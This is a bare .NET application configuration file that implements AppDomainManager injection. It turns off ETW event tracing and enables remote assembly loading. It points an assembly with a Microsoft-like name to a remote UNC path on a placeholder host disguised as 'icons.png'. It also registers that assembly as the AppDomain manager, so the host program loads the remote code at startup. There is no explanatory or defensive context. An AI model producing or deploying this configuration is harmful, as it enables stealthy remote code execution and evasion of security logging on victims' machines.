<configuration>
    <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
        <dependentAssembly>
            <assemblyIdentity name="Microsoft.CSTLR" publicKeyToken="476a3700238becf6" culture="neutral" />
            <codeBase version="1.0.0.1" href="\\XXXX@80/icons.png"/>
        </dependentAssembly>
    </assemblyBinding>
    <etwEnable enabled="false" />
    <loadFromRemoteSources enabled="true"/>
    <appDomainManagerAssembly value="Microsoft.CSTLR, Version=1.0.0.1, Culture=neutral, PublicKeyToken=476a3700238becf6" />
    <appDomainManagerType value="MSCLR" />
    </runtime>
</configuration>
